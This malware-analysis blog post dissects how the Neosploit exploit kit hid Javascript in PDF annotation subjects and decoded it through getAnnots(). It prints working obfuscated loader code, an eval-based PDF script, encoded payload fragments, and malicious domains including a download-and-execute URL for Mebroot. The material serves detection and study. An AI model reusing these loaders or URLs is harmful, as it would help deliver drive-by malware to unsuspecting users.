PDF Obfuscation using getAnnots()

Since around October 2009, Neosploit¹, a black-market exploit toolkit, has been building its PDF files in a slightly new way, one that many parsers find difficult to analyze for maliciousness. In summary, all of the metadata in a PDF is accessible from the Acrobat Javascript environment, and this metadata is being used to obscure embedded Javascript code. To find the exploit, a PDF parser would need to populate all of the document objects with the correct data and then evaluate the Javascript. (Needless to say, many signature-based PDF parsers don't do this.) These malicious PDFs ultimately install Mebroot (aka Sinowal)².

[And, oh yeah, our product detects this.]

Breaking News

Update: There's another exploit toolkit doing similar metadata tricks to obscure a CVE-2009-4324 attack. (That's the most recent 0-day.)

I'm going to use this for most of my examples (warning: live as of this writing):

google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.php

The Wepawet Analysis

The VirusTotal Analysis on the downloaded EXE (56a6e96863f6dc0c5c5c64fca6bd3c52)

A Brief Word about Neosploit¹

As with some other toolkits, the first exploit page can only be fetched once per source IP; it returns a 404 if you try to fetch it again. The Javascript is broken up into multiple chunks, which are fetched by the first chunk, deobfuscated, reassembled, and executed. The URI is slightly polymorphic. For example, all of these are really the same program on the server:

google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.exe

google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.php

google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.py

google.com.analytics.eicyxtaecun.com/nte/TREST11 .asp

google.com.analytics.eicyxtaecun.com/nte/TREST11.exe

google.com.analytics.eicyxtaecun.com/nte/TREST11.html

google.com.analytics.eicyxtaecun.com/nte/TREST11.php

google.com.analytics.eicyxtaecun.com/nte/TREST11.py

[etc.]

Files starting with "j" appear to be Javascript, files starting with "e" appear to be EXEs, and files starting with "o" are the polymorphically generated exploit PDFs. Observe:

eH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948320: PE32 executable for MS Windows (DLL)

jH999a4551V0100f070006R00000000102Td2dcca7b201L656e2d75730000000000K91a68948: ASCII text, with very long lines

oH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948317: PDF document, version 1.3

The filename is composed of several fields of hexadecimal value, with separators which are not in the set [0-9a-f] (case sensitive, "F" is a valid separator). From the above example:

j H999a4551 V0100f070006 R00000000102 Td2dcca7b 2 01 L656e2d75730000000000 K91a68948

e H999a4551 V0100f070006 R00000000102 Td2dcca7d 2 01 l0409 K91a68948320

o H999a4551 V0100f070006 R00000000102 Td2dcca7d 2 01 l0409 K91a68948317

The "2 01" is the browser version, and "L656e2d75730000000000" means "en-us" (the hex bytes 65 6e 2d 75 73 are the ASCII codes for that string). I haven't bothered to figure out the rest yet.
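The field layout described above can be sketched in a few lines of Javascript. This is only an illustration, assuming the first character is the file type and every other character outside [0-9a-f] starts a new field; the names splitFields and hexToAscii are mine, not anything from the toolkit. Note that this naive split leaves the "2 01" browser-version digits glued to the end of the T field.

```javascript
// Split a Neosploit-style filename into its type prefix and hex fields.
// Assumption: the first character is the type (j/e/o) and every other
// character outside [0-9a-f] is a separator that starts a new field.
function splitFields(name) {
  const fields = [];
  const re = /([^0-9a-f])([0-9a-f]*)/g;
  const rest = name.slice(1);
  let m;
  while ((m = re.exec(rest)) !== null) {
    fields.push({ tag: m[1], value: m[2] });
  }
  return { type: name[0], fields };
}

// Decode a hex string as ASCII, skipping zero padding bytes.
function hexToAscii(hex) {
  let out = "";
  for (let i = 0; i + 1 < hex.length; i += 2) {
    const code = parseInt(hex.slice(i, i + 2), 16);
    if (code !== 0) out += String.fromCharCode(code);
  }
  return out;
}

const parsed = splitFields(
  "jH999a4551V0100f070006R00000000102Td2dcca7b201L656e2d75730000000000K91a68948"
);
const langField = parsed.fields.find((f) => f.tag === "L");
console.log(parsed.type, parsed.fields.map((f) => f.tag).join(""));
console.log(hexToAscii(langField.value));
```

Treating the first character separately matters because "e" is itself a valid hex digit.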

This is the first chunk of Javascript that hits your browser. If you started from, say, http://dgvlvhhytlta.com/nte/GNH4.exe it would fetch the next chunk (the variable pums) from http://dgvlvhhytlta.com/nte/GNH4.exe/jH999a4551V0100f070006…. These stages are not in the Wepawet analysis I mentioned above, so I'm including them here for completeness.

<html>


<head>

<script>

function nerot(o6v28_IX_KM, D5___o){var O_Pp6_l = arguments.callee;O_Pp6_l = O_Pp6_l.toString();var X6q8_bl = 0;var U_a8___ej = "a" + "f";var Ghc62j5r1Wr8P = document.getElementById(U_a8___ej);if (Ghc62j5r1Wr8P) {if (!D5___o) {D5___o = Ghc62j5r1Wr8P.value;}}X6q8_bl++;X6q8_bl++;var firot = new Array();if (o6v28_IX_KM) { firot = o6v28_IX_KM;} else {var tk_048_6R_6CyPe = 0;var ScS1Bncy_d_8 = 0;var G_2__3A_r = 512;var gw55F_B__BBV2 = 49;gw55F_B__BBV2--;while(ScS1Bncy_d_8 < O_Pp6_l.length) {var G_sv_c7x6qjTn = 1;var m8d_GS__whx = O_Pp6_l.charCodeAt(ScS1Bncy_d_8);if (m8d_GS__whx >= gw55F_B__BBV2 && m8d_GS__whx <= (gw55F_B__BBV2 + 9)) {if (tk_048_6R_6CyPe == 4) { tk_048_6R_6CyPe = 0; }if (isNaN(firot[tk_048_6R_6CyPe])) { firot[tk_048_6R_6CyPe] = 0; }firot[tk_048_6R_6CyPe] += m8d_GS__whx;if (firot[tk_048_6R_6CyPe] > G_2__3A_r) {firot[tk_048_6R_6CyPe] -= G_2__3A_r;}tk_048_6R_6CyPe++;}ScS1Bncy_d_8++;}}tk_048_6R_6CyPe = 4;while (tk_048_6R_6CyPe > 0) {if (firot[tk_048_6R_6CyPe - 1] > 256) {firot[tk_048_6R_6CyPe - 1] -= 256;}tk_048_6R_6CyPe--;}var QmyQ7eL0R = 0;var x1Kf_448jleM42 = "";var sp__yv_2g_K04cp = 0;var j_G1g_1 = 0;var T__D6_r = 0;var y_6A__C_u;var pdbpQb = 0;while(j_G1g_1 < D5___o.length) {var T_B203hvS__Wvt = D5___o.substr(j_G1g_1, 1) + "J";var Pbukfx_2f7D__1w = parseInt(T_B203hvS__Wvt, 16);if (T__D6_r) {y_6A__C_u += Pbukfx_2f7D__1w;if (QmyQ7eL0R == 4) {QmyQ7eL0R -= 4;}var iJ_d_Qth = y_6A__C_u;iJ_d_Qth = iJ_d_Qth - (pdbpQb + 2) * firot[QmyQ7eL0R];if (iJ_d_Qth < 0) {var xgY5uT7__QoL = Math.floor(iJ_d_Qth / 256);iJ_d_Qth = iJ_d_Qth - xgY5uT7__QoL * 256;}iJ_d_Qth = String.fromCharCode(iJ_d_Qth);if (X6q8_bl == 1) {x1Kf_448jleM42 += Pbukfx_2f7D__1w;} else if (X6q8_bl == 2) {x1Kf_448jleM42 += iJ_d_Qth;} else {x1Kf_448jleM42 += j_G1g_1;}QmyQ7eL0R++;pdbpQb++;T__D6_r = 0;} else {y_6A__C_u = Pbukfx_2f7D__1w * 16;T__D6_r = 1;}j_G1g_1++;};;eval(x1Kf_448jleM42);return 0;}

</script>

</head>

<body onload="nerot();">

<input type="hidden" id="aa" value="1">

<input type="hidden" id="af" value="F2D096B1BB5AA764CBE6B0E3B18 […] 745A6F">

<input type="hidden" id="ab" value="1">

</body>

</html>

And the second chunk:

var pums = 'C8763EB09A160F5F0AC4CEB76';

Find The Pattern

Here are some names of generated PDFs. I've broken the names up into what I believe are separate fields. See if you can find the pattern. None of these is obviously an IP address. (I checked for that.)

AVORP1TREST11.exe/o U2773a43b H918373c0 V03007f35002 R8d56bfa1108 Tdac6495d Q000002fc900801 F0020000a J11000601l0409 Kfa01dcdb317: PDF document, version 1.3

AVORP1TREST11.php/o Hf7b12f26 V0100f060006Rf53e765c102 Tbcf2d195204 l0409 K98c2615b317: PDF document, version 1.3

AVORP1TREST11.py/o H999a4551 V0100f070006R00000000102 Td2dcca7d201 l0409 K91a68948317: PDF document, version 1.3

AVORP1TREST11.py/o H9efd3f2d V03006f35002Rf53e765c102 Td5b83f0c Q000002fa901801 F0020000a J11000601 l0409 K5b7f0e41317: PDF document, version 1.3

TREST11 .asp/o H47834891 V0100f060006 R89a36f9c102 T0cc787be203l0409 K07105315317: PDF document, version 1.3

TREST11 .asp/o H91b0de2f V0100f070006 R8f56bc05102 Tdaf42f62201l0404 K544d4bfe317: PDF document, version 1.3

TREST11 .asp/o Ha98d29bd V0100f060006 R89a36f9c102 Te2cb340e204l0409 K4b290413317: PDF document, version 1.3

TREST11 .asp/o He22f9c5c V03007f35002 R8d56bfa1102 Ta96aa0ae Q000002fc901801 F000c000a J10000601 l0409 Kc5ceb2bf317: PDF document, version 1.3

TREST11 .asp/o Hf7ba1c39 V03005f35002 Rf53e765c102 Tbcff3946 Q000002fd901801 F0020000a J11000601 l0409 K4e3afa12317: PDF document, version 1.3

TREST11.exe/o H30847807 V0100f060006 R89a36f9c102 T7bc0ed53203l0409 K7b4d501b317: PDF document, version 1.3

TREST11.exe/o H3ebec388 V03007f35002 Rf53e765c102 T75fbc09a Q000002fc901801 F002a000a J11000601 l0409 Kaa9ea783317: PDF document, version 1.3

TREST11.exe/o H82fea487 V0100f080006 Rf53e765c102 Tc9bb26de201l0409 Kfee4acbe317: PDF document, version 1.3

TREST11.html/o H8b9e4040 V03007f35002 Rf53e765c102 Tc0db4487 Q000002fd901801 F002a000a J11000601 l0409 K575b6c55317: PDF document, version 1.3

TREST11.html/o H9ee97623 V03006f35002 Rf53e765c108 Td5ad4a05 Q000002fd900801 F0020000a J11000601 l0409 K539b6710317: PDF document, version 1.3

TREST11.html/o Ha98d29bd V0100f060006 Rf53e765c102 Te2cb34e5204 l0409K35e5f3e5317: PDF document, version 1.3

TREST11.html/o Hd6a7ae5c V0100f080006 Rf53e765c102 T9de446b5201 l0409Kab6a7970317: PDF document, version 1.3

TREST11.php/o H47834891 V0100f060006 Rf53e765c102 T0cc6cd94203 l0409K6c8c5ba1317: PDF document, version 1.3

TREST11.php/o Hdfab3f7e V0100f080006 R8d56bfa110a T94ee748e201 l0409K678f4226317: PDF document, version 1.3

TREST11.php/o Hff15790b V03006f35002 Rf53e765c10a Tb4506ce8 Q000002fc901801 F002a000a J00000000 l0409 Kadd89d89317: PDF document, version 1.3

TREST11.py/o H28d77e41 V0100f060006 R7bd67009102 T63951338203 l0409 K3c732e33317: PDF document, version 1.3

TREST11.py/o H9ef9bb5c V03007f35002 Rf53e765c102 Td5bdef71 Q000002fc901801 F0020000a J11000601 l0409 Kd3978d8b317: PDF document, version 1.3

TREST11.py/o Hde8a192b V0100f060006 R8f56bc05102 T95cf8f5f203 l0409 K6f2c23ff317: PDF document, version 1.3

TREST11.py/o He5441011 V0100f070006 R89a36f9c102 Tae012b23201 l0804 Ka373855f317: PDF document, version 1.3

TREST11.py/o Hf9287a3c V03006f35002 Rf53e765c10a Tb26c5103 Q000002fc900801 F0020000a J00000000 l0409 Kf8aab2d0317: PDF document, version 1.3

TREST11.py/o Hfb50394b V03007f35002 Rf53e765c102 Tb0152511 Q00000000901801 F002a000a J11000601 l0409 K77546b04317: PDF document, version 1.3

chrisbecfiis.com/nte/AVORP1TREST1.py/eH999a4551V0100f070006R00000000102Td2b6e14c201l0409K816c9c70320: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit

cjbtiybcpnf.com/nte/trest11.py/eH999a4551V0100f070006R00000000102Td2a93f54201l0409320: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.py/eH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948320: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit

I guess that's more than a brief word.

How To Speak PDF

 

The PDF itself is rather clean and easy to read³, so I'll step you through it here.

First⁴, Acrobat checks that the first line is %PDF-1.something and that the last line is %%EOF. The second and third lines from the end are the offset (in bytes) to the cross reference table (the list of objects in the file) and the word startxref. Somewhere near all that is the trailer dictionary, which says there are nine objects in this file.

The cross reference table [xref] is consulted next. It says there are nine objects in this table, and that…

Object #1 starts at byte offset 17. (0x11)

Object #2 starts at offset 93. (0x5D), etc…

It's possible to have multiple xref tables by design, so that PDF files can be incrementally updated. [The purpose of the xref table is to let a PDF reader find each object quickly, without needing to scan the entire file first to locate it, and without needing to rewrite the entire file just to edit something.]

xref

0 9 ← This table references objects 0 through 8

0000000000 65535 f ← A "Free" (deleted) object; generation 65535 means never reuse this number

0000000017 00000 n ← Object 1 starts at offset 17 bytes

0000000093 00000 n ← Object 2 starts at offset 93 bytes

0000000134 00000 n ← Object 3 starts at offset 134 bytes. The generation number (second column) goes up by one for any object number freed and reused.

[etc.]

0000000411 00000 n ← Object 7 starts at offset 411 bytes

0000000641 00000 n ← Object 8 (9th counting from 0)

trailer<</Size 9/Root 1 0 R>> ← Nine objects, Object 1 is the top of the document object tree (The /Catalog object).

startxref

9323 ← Offset to xref above

%%EOF

Offset Examples

00000000  25 50 44 46 2d 31 2e 33  0d 0a 25 b1 b3 f3 ce 0d  |%PDF-1.3..%.....|

00000010 0a 31 20 30 20 6f 62 6a 3c 3c 2f 54 79 70 65 2f |.1 0 obj<</Type/|

Byte 17 (0x11) is a "1"

[…]

00000040 20 52 2f 4f 70 65 6e 41 63 74 69 6f 6e 20 36 20 | R/OpenAction 6 |

00000050 30 20 52 3e 3e 65 6e 64 6f 62 6a 0d 0a 32 20 30 |0 R>>endobj..2 0|

Byte 93 (0x5D) is a "2"

00000060 20 6f 62 6a 3c 3c 2f 54 79 70 65 2f 4f 75 74 6c | obj<</Type/Outl|

[…]

00002450 ff 03 a2 65 8b 77 0d 0a 65 6e 64 73 74 72 65 61 |...e.w..endstrea|

00002460 6d 0d 0a 65 6e 64 6f 62 6a 0d 0a 78 72 65 66 0d |m..endobj..xref.|

Byte 9323 (0x246B) is the "x" of "xref"

00002470 0a 30 20 39 0d 0a 30 30 30 30 30 30 30 30 30 30 |.0 9..0000000000|

The comment near the beginning of the file (the four bytes with their high bits set) is there to warn systems that distinguish between 'text' and 'binary' file modes that this file should be treated as binary.
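If you want to check those offsets mechanically, here is a minimal sketch of reading a classic xref section and confirming that an entry really points at the start of its object. It assumes a single subsection and a file held as a one-byte-per-character string; parseXref and pointsAtObject are illustrative names, and the header string is rebuilt from the hex dump above.

```javascript
// Parse a classic (non-stream) cross-reference section.
// Assumption: exactly one subsection, "first count", followed by one entry
// per line: 10-digit offset, 5-digit generation, then n (in use) or f (free).
function parseXref(text) {
  const lines = text
    .split(/\r?\n/)
    .map((l) => l.trim())
    .filter((l) => l.length > 0);
  if (lines[0] !== "xref") throw new Error("not an xref section");
  const [first, count] = lines[1].split(/\s+/).map(Number);
  const entries = [];
  for (let i = 0; i < count; i++) {
    const m = /^(\d{10}) (\d{5}) ([nf])$/.exec(lines[2 + i]);
    if (!m) throw new Error("bad xref entry: " + lines[2 + i]);
    entries.push({
      objNum: first + i,
      offset: parseInt(m[1], 10),
      generation: parseInt(m[2], 10),
      inUse: m[3] === "n",
    });
  }
  return entries;
}

// Check that an entry points at "<objNum> <generation> obj".
// The pdf argument must be a binary (latin1) string so that string
// indexes equal byte offsets.
function pointsAtObject(pdf, entry) {
  const expected = entry.objNum + " " + entry.generation + " obj";
  return pdf.slice(entry.offset, entry.offset + expected.length) === expected;
}

const xrefText = [
  "xref", "0 9",
  "0000000000 65535 f", "0000000017 00000 n", "0000000093 00000 n",
  "0000000134 00000 n", "0000000184 00000 n", "0000000266 00000 n",
  "0000000358 00000 n", "0000000411 00000 n", "0000000641 00000 n",
].join("\r\n");
const table = parseXref(xrefText);

// First bytes of the sample, taken from the hex dump.
const header = "%PDF-1.3\r\n%\xb1\xb3\xf3\xce\r\n1 0 obj<</Type/";
console.log(table[1], pointsAtObject(header, table[1]));
```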

Brief Syntax Guide

 

  • Anything between % and end-of-line is a comment.
  • Anything between ()'s is a literal string.
  • Anything starting with a / is a Name.
  • Anything inside of []'s is an array.
  • Anything inside of stream endstream is a data stream (think of it as a very large string constant or blob).
  • Anything inside of <<>> is a dictionary of name-value pairs, like this:

    <</Type /foo /Thingy 123456>>

  • Indirect objects are defined like Object_Number Version obj Stuff endobj. For example: 123 45 obj(I'm a literal string)endobj. (The "version" is the generation number from the xref table.)
  • An indirect object can be used (referenced) from anywhere that a normal object (string, integer, etc.) would go, by simply writing the object number and version number followed by an R. For example: 123 45 R substitutes for that literal string in the example above.
  • Every useful dictionary object has an entry for what /Type it is. For example, the /Catalog type is used for the document tree root, and /Font is used for font objects.

That Neosploit PDF

Object #1 (The Catalog object) says that…

Object #2 is the top of the Outline tree (that side panel in your PDF viewer)…

Object #3 is the top of the Page tree…

And to perform the action in Object #6 when the document is opened.

Object #2 says there really isn't an outline for this document.

Object #3 says there is one page in the tree, which is Object #4.

Object #6 says to execute the Javascript in Object #7.

Object #4 is the descendant of Object #3. It says the page size is 612x792 points (or 8.5x11 inches), and that it contains an Annotation, with the annotation details in Object #5…

Object #5 says that Object #8 is the Subject of this Annotation (The sekret Javascript exploit code).

These are the good parts:

Object #7 is the Javascript that's executed upon document open. It's a decoder for the Javascript hidden in…

Object #8 The Annotation Subject string, a large blob of encoded Javascript.

In PDF-Speak

%PDF-1.3

%Four bytes between 0x80 and 0xFF

1 0 obj<</Type/Catalog/Outlines 2 0 R/Pages 3 0 R/OpenAction 6 0 R>>endobj

2 0 obj<</Type/Outlines/Count 0>>endobj

3 0 obj<</Type/Pages/Kids[4 0 R]/Count 1>>endobj

4 0 obj<</Type/Page /Annots[ 5 0 R ]/Parent 3 0 R/MediaBox [0 0 612 792]>>endobj

5 0 obj<</Type/Annot /Subtype /Text /Name /Comment/Rect[25 100 60 115] /Subj 8 0 R>>endobj

6 0 obj<</Type/Action/S/JavaScript/JS 7 0 R>>endobj

7 0 obj<</Length 158/Filter/FlateDecode>>

stream

The zlib compressed data goes here

endstream

endobj

8 0 obj<</Length 8609/Filter/FlateDecode>>

stream

The other zlib compressed data goes here

endstream

endobj

xref

0 9

0000000000 65535 f

0000000017 00000 n

0000000093 00000 n

0000000134 00000 n

0000000184 00000 n

0000000266 00000 n

0000000358 00000 n

0000000411 00000 n

0000000641 00000 n

trailer<</Size 9/Root 1 0 R>>

startxref

9323

%%EOF
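The object walk described earlier (Catalog to OpenAction to the Javascript stream, and Page to Annots to Subj) can be sketched with a couple of regular expressions. This is a rough illustration that assumes a plain-text body with no object streams and nothing inside a stream that looks like "endobj"; a real scanner needs a real parser. The helpers indexObjects and refOf are hypothetical names.

```javascript
// Index indirect objects of the form "N G obj ... endobj" by object number.
// Assumption: no object streams, and no stream data containing "endobj".
function indexObjects(pdf) {
  const objects = new Map();
  const re = /(\d+) (\d+) obj([\s\S]*?)endobj/g;
  let m;
  while ((m = re.exec(pdf)) !== null) {
    objects.set(Number(m[1]), m[3]);
  }
  return objects;
}

// Return the object number referenced by "/Key N G R" or "/Key [ N G R ]",
// or null when the key is absent.
function refOf(body, key) {
  const m = new RegExp("/" + key + "\\s*\\[?\\s*(\\d+) \\d+ R").exec(body);
  return m ? Number(m[1]) : null;
}

const sample = [
  "1 0 obj<</Type/Catalog/Outlines 2 0 R/Pages 3 0 R/OpenAction 6 0 R>>endobj",
  "3 0 obj<</Type/Pages/Kids[4 0 R]/Count 1>>endobj",
  "4 0 obj<</Type/Page /Annots[ 5 0 R ]/Parent 3 0 R/MediaBox [0 0 612 792]>>endobj",
  "5 0 obj<</Type/Annot /Subtype /Text /Name /Comment/Rect[25 100 60 115] /Subj 8 0 R>>endobj",
  "6 0 obj<</Type/Action/S/JavaScript/JS 7 0 R>>endobj",
].join("\r\n");

const objs = indexObjects(sample);
const action = refOf(objs.get(1), "OpenAction");
const script = refOf(objs.get(action), "JS");
const pages = refOf(objs.get(1), "Pages");
const page = refOf(objs.get(pages), "Kids");
const annot = refOf(objs.get(page), "Annots");
const subject = refOf(objs.get(annot), "Subj");
console.log({ action, script, page, annot, subject });
```

The two streams a scanner cares about fall out as the script object (the decoder) and the subject object (the encoded payload).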

Analysis

The /FlateDecode streams are compressed with the deflate algorithm, the exact same one used in PKZip, gzip, and PNG.

If you're trapped on a desert island with only primitive Unix tools, you can just slap a gzip header onto the beginning of the zlib compressed blob and use gunzip to decompress it. (Don't forget to add four bytes to the end for the length.)

$ echo -ne "\x1f\x8b\x08\x00BLAH" > example.gz

$ cat stream7 >> example.gz

$ echo -ne "\x00\x00\x00\x00" >> example.gz

$ zcat example.gz |less

zcat: example.gz: invalid compressed data--crc error

zcat: example.gz: invalid compressed data--length error

var z; var y; z = y = app.doc;

y = 0; z.syncAnnotScan ( ); y = z;var p = y.getAnnots( { nPage: 0 }) ;var s = p[0].subject; var l = s.replace(/z/g, '%'); s = unescape (l) ;eval(s); s = ''; z = 1;

Hey look! It's Javascript!

This trick only works as long as bit 5 of the second byte of the zlib stream is not set. (I've not seen it set in a PDF stream yet.) I'd explain why this works, but this blog post is too long already. Compare RFC 1950 Section 2.2 with RFC 1952 Section 2.3 if you really want to know. You can also decompress the stream with pencil and paper if you don't have a computer. It's not that difficult; just remember that the bits in each octet are reversed from how they look in RFC 1951. (Why are y'all looking at me like that? I had to fix a corrupt zip file…)
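For the curious, the short version: a gzip header is ten bytes, and the eight bytes written by the echo are followed by the two-byte zlib header, which lands where gzip expects its XFL and OS bytes. The zlib Adler-32 trailer plus the four added bytes fill the slots where gzip expects a CRC-32 and a length, hence the two complaints from zcat. If bit 5 (FDICT) were set, a four-byte dictionary ID would follow the zlib header and get misread as compressed data. Here is a hedged sketch of the same idea using Node's built-in zlib module rather than a fake gzip header; zlibHeader and inflateStream are illustrative names.

```javascript
const zlib = require("zlib");

// Inspect the two-byte zlib header (RFC 1950, section 2.2).
function zlibHeader(buf) {
  const cmf = buf[0];
  const flg = buf[1];
  return {
    method: cmf & 0x0f,                      // 8 means deflate
    checkOk: (cmf * 256 + flg) % 31 === 0,   // FCHECK makes this a multiple of 31
    hasDict: (flg & 0x20) !== 0,             // bit 5 of the second byte (FDICT)
  };
}

// Strip the 2-byte header and the 4-byte Adler-32 trailer, then inflate the
// raw deflate data in between. Assumption: no preset dictionary.
function inflateStream(buf) {
  const h = zlibHeader(buf);
  if (h.method !== 8 || !h.checkOk) throw new Error("not a zlib stream");
  if (h.hasDict) throw new Error("preset dictionary not handled in this sketch");
  return zlib.inflateRawSync(buf.subarray(2, buf.length - 4));
}

// Stand-in for a /FlateDecode stream body pulled out of a PDF.
const packed = zlib.deflateSync(Buffer.from("var z; var y; z = y = app.doc;"));
console.log(zlibHeader(packed));
console.log(inflateStream(packed).toString("latin1"));
```

In practice zlib.inflateSync(buf) does all of this (and verifies the checksum) in one call; the manual version is only here to show which bytes are which.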

Otherwise use xpdf or Didier Stevens' tool(s) like a normal person.

pdftosrc oH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948317 7

pdftosrc oH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948317 8

python pdf-parser.py -f oH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948317

Back to the PDF

This is the uncompressed stream from Object #7.

Almost every PDF I've examined so far has this exact same code in Object #7. (There's apparently a newer version of the toolkit which is doing a little bit of obfuscation to this block.)

var z; var y; z = y = app.doc;

 

y = 0; z.syncAnnotScan ( ); y = z;var p = y.getAnnots( { nPage: 0 }) ;var s = p[0].subject; var l = s.replace(/z/g, '%'); s = unescape (l) ;eval(s); s = ''; z = 1;

[This getAnnots() usage is completely unrelated to CVE-2009-1492]

The uncompressed stream from Object #8, which is the subject of this annotation and the second stage of Javascript, is:

z0dz0az0dz0az09z66z75z6ez63z74z69z […]

The z characters are replaced by %, and then the whole thing unescape()'d. I've seen other variants use y, g, or h, and a little more obfuscation of the code above.
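A scanner can do the same substitution without executing anything. A minimal sketch, assuming the marker letter is only ever used as the escape prefix (which holds when every byte of the payload is escaped); decodeSubject is an illustrative name.

```javascript
// Decode an annotation subject the way the Object #7 loader does, but
// return the text instead of eval()'ing it.
// Assumption: the marker letter appears only as an escape prefix.
function decodeSubject(subject, marker) {
  const re = new RegExp(marker, "g");
  return unescape(subject.replace(re, "%"));
}

// The first bytes of the Object #8 stream shown above.
const head = decodeSubject("z0dz0az0dz0az09z66z75z6ez63z74z69", "z");
console.log(JSON.stringify(head));
```

The decoded prefix is two CRLF pairs, a TAB, and the start of the word "function".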

More obfuscation from a different Neosploit toolkit

For example:

var z; var y;

var h = 'edvoazcl';

z = y = app[h.replace(/[aviezjl]/g, '')];

var tmp = 'syncAEEotScan'; y = 0; z[tmp.replace(/E/g, 'n')](); y = z; var p = y.getAnnots ( { nPage: 0 }) ; var s = p[0]; s = s['sub' + 'ject']; var l = s.replace(/[zhyg]/g, '%') ; s = unescape ( l ) ;app[h.replace(/[czomdqs]/g, '')]( s);

s = ''; z = 1;

In this sample, the 'y' characters are replaced by '%' (the character class also covers z, h, and g), and then the whole thing is unescaped.

s.replace(/[zhyg]/g, '%')

y0dy0ay0dy0ay09y66y75y6ey63y74y69y6fy6ey20y58y36y5fy5fy34y6by33y56y64y4ay56y62y30y49y64y28y76y5fy5fy4dy61y78y6ay2cy20y70y30y5fy59y32y54y29y7by76y61y72y20y73y5fy5fy5fy51y33y35y68y [...]
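The extra obfuscation in this variant is just string arithmetic on property names, so it can be resolved by evaluating the string expressions on their own. The snippet below only runs the replace() calls copied from the sample; the variable names are mine.

```javascript
// Evaluate only the string-building expressions from the variant above.
const h = "edvoazcl";
const docName = h.replace(/[aviezjl]/g, "");          // property read from app
const evalName = h.replace(/[czomdqs]/g, "");         // method called on app
const scanName = "syncAEEotScan".replace(/E/g, "n");  // method called on the doc
const propName = "sub" + "ject";                      // property read from the annotation
console.log(docName, evalName, scanName, propName);
```

So the same eight-letter string hides both names, and the code is functionally the same loader as before.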

About syncAnnotScan and getAnnots

12.5.6.4         Text Annotations

A text annotation represents a “sticky note” attached to a point in the PDF document. When closed, the annotation shall appear as an icon; when open, it shall display a pop-up window containing the text of the note in a font and size chosen by the conforming reader. Text annotations shall not scale and rotate with the page; they shall behave as if the NoZoom and NoRotate annotation flags (see Table 165) were always set. Table 172 shows the annotation dictionary entries specific to this type of annotation.
— From the PDF 1.7 Reference ISO 32000-1:2008.

So let's take a look at that annotation object again:

5 0 obj <<

   /Type/Annot

   /Subtype /Text ← This is a Text Annotation

   /Name /Comment ← Default to a Comment-Style Icon for display

   /Rect[25 100 60 115] ← Location of the annotation on page.

   /Subj 8 0 R ← Subject is that object full of encoded Javascript

>>endobj

 

/Subj
Text representing a short description of the subject being addressed by the annotation. ISO 32000-1

The getAnnots() function returns an array of annotation objects, and accepts an associative array with the following possible labels [ibid.]:

 

nPage
A 0-based page number. If not set, annotations from all pages that match the filter are returned.

 

nSortBy
A sort method applied to the array. (by Page, Author, Moddate, etc.)

 

bReverse
If true, causes the array to be reverse sorted with respect to nSortBy.

 

nFilterBy
Gets only annotations satisfying certain criteria. (Printable, viewable, editable, etc.)

Contrast this with getAnnot() which returns a single Annot object by name.

Example

// From the Acrobat JavaScript Scripting Reference

// All annotations on the first page, in reverse order by author.

var annots = this.getAnnots({

nPage:0,

nSortBy: ANSB_Author,

bReverse: true

});

Cleaned Up Code With Commentary

var z;

var y;

z = y = app.doc;

y = 0;

z.syncAnnotScan ( ); // Acrobat scans for annotations in the

// document, as a background task.

// This function blocks until all of the

// annotations in the document have been found.

y = z;

var p = y.getAnnots( { nPage: 0 }) ; // This is the new technique.

// getAnnots() returns a list of annotation

// objects. (For the first page in this case)

var s = p[0].subject; // Get the subject from the first annotation

// object.

var l = s.replace(/z/g, '%'); // The 'z' characters are replaced by '%'

s = unescape (l) ; // and then the whole thing unescape()'d

eval(s); // Run the second stage Javascript

s = '';

z = 1;
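To get past this stage, an emulator has to supply just enough of the Acrobat object model for the loader to run. Here is a rough sketch of that idea: a fake app object whose getAnnots() hands back the annotation subjects extracted from the file, with the eval() swapped for a capture. Everything here (makeFakeApp, runLoader, the assumption that all annotations are on page 0) is hypothetical scaffolding, not Acrobat's actual behavior.

```javascript
// A stand-in for the parts of the Acrobat object model this loader touches.
function makeFakeApp(subjects) {
  const doc = {
    syncAnnotScan() {},  // nothing to wait for in this fake
    getAnnots(opts) {
      // Assumption: every annotation lives on page 0.
      if (opts && opts.nPage !== undefined && opts.nPage !== 0) return null;
      return subjects.map((s) => ({ subject: s }));
    },
  };
  return { doc };
}

// Follow the loader's steps against the fake environment and capture the
// second stage instead of executing it.
function runLoader(app) {
  const captured = [];
  const z = app.doc;
  z.syncAnnotScan();
  const p = z.getAnnots({ nPage: 0 });
  const s = p[0].subject;
  captured.push(unescape(s.replace(/z/g, "%")));  // where eval(s) would be
  return captured;
}

// "z76z61z72z20z61z3b" is a harmless stand-in payload.
const stage2 = runLoader(makeFakeApp(["z76z61z72z20z61z3b"]));
console.log(stage2[0]);
```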

The Next Part

The third layer of this Javascript onion will decode the next part differently, depending on whether or not the app object is defined. (It is defined inside of Acrobat Reader, but not within most other ECMAScript/Javascript engines.) If your parser doesn't get a "2" out of this:

 

try {

if (app) {

magic_value = 2;

}

} catch(e) {

}

Then it's going to eval() gibberish. If decoded correctly, it does a heap spray and exploits Collab.collectEmailInfo(). The shellcode does an HTTP download and execute from:

http://google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.py/eH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948320

… What Virustotal says about it: 56a6e96863f6dc0c5c5c64fca6bd3c52 (It's Mebroot).
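Going back to that app check for a moment, here is a small sketch of why a generic Javascript engine takes the wrong branch. The same body is compiled twice with new Function: once where app is an undeclared global (the bare reference throws, and the catch swallows it), and once where app is supplied. The assumption is that nothing else in the host has defined a global named app.

```javascript
// The check from the sample, wrapped so it returns the value it computes.
const body =
  "var magic_value = 0;" +
  "try { if (app) { magic_value = 2; } } catch (e) { }" +
  "return magic_value;";

// Functions built with new Function only see globals, so `app` is undeclared here.
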